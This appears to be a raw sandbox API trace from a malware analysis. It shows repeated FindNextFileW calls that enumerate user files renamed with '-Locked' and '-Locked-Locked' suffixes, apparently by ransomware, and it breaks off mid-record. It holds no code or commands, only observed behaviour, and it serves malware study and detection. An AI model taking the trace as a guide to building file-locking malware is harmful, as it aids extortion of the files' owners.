FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3602eacf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3602eacf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3602eacf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0305.250] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0305.250] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3608b7bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3608b7bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3608b7bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked", cAlternateFileName="CX4AG~2.DOC")) returned 1 [0305.250] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0305.250] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360ab2d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360ab2d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360ab2d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0305.251] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.251] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360bd8ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360bd8ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360bd8ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0305.251] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0305.251] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360d10bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360d10bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360d10bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0305.252] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0305.252] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36130501, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36130501, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36130501, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0305.252] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0305.252] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361946b9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x361946b9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x361946b9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked", cAlternateFileName="HELJNZ~2.BMP")) returned 1 [0305.253] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0305.253] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3628d5d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3628d5d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3628d5d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0305.253] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0305.253] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362af9e1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362af9e1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362af9e1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0305.253] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0305.254] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362cf450, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362cf450, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362cf450, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked", cAlternateFileName="IZRQFJ~2.M4A")) returned 1 [0305.254] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0305.254] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3630777f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3630777f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked", cAlternateFileName="L0CW~1.DOC")) returned 1 [0305.255] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0305.255] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364167a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364167a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364167a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0305.255] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0305.255] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3641ef6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3641ef6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3641ef6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0305.255] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0305.256] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36425180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36425180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36425180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked", cAlternateFileName="MYZQDK~2.MP3")) returned 1 [0305.256] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0305.256] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3642edd9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3642edd9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3642edd9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0305.256] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0305.257] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364363bc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364363bc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364363bc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked", cAlternateFileName="OQWYTP~2.BMP")) returned 1 [0305.257] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0305.257] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364439d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364439d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364439d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0305.258] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0305.258] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3644aec5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3644aec5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3644aec5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked", cAlternateFileName="SONI~2.JPG")) returned 1 [0305.258] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0305.258] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36452403, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36452403, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36452403, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked", cAlternateFileName="STLRGM~2.FLV")) returned 1 [0305.258] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0305.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364598c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364598c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364598c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked", cAlternateFileName="TMHBBP~2.MP4")) returned 1 [0305.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0305.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645fa98, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3645fa98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3645fa98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0305.260] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0305.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364649d0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364649d0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364649d0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0305.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0305.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36476736, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36476736, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36476736, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked", cAlternateFileName="VL-8WX~2.PNG")) returned 1 [0305.261] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, 